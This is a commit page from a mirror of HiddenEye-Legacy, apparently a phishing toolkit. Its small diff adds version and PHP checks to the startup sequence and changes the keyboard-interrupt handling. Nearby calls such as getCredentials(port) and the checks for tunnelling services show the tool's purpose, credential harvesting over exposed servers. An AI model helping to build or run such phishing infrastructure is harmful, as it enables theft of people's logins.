mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Added Version Check.
This commit is contained in:
parent
8eedd6686c
commit
5c4f69e5c7
@ -22,6 +22,8 @@ checkPermissions()
|
||||
installGetText()
|
||||
languageSelector()
|
||||
checkConnection()
|
||||
verCheck()
|
||||
checkPHP()
|
||||
checkLocalxpose()
|
||||
checkNgrok()
|
||||
checkOpenport()
|
||||
@ -31,7 +33,6 @@ checkLT()
|
||||
ifSettingsNotExists()
|
||||
readConfig()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
runMainMenu()
|
||||
@ -52,5 +53,6 @@ if __name__ == "__main__":
|
||||
getCredentials(port)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
emailPrompt3(port)
|
||||
port = '8080' # When Keyword Interrupt Occurs before defining Port by User. Script will use 8080 port.(Just To Remove Exception Errors)
|
||||
endMessage(port)
|
||||
exit()
|
||||
|
Loading…
x
Reference in New Issue
Block a user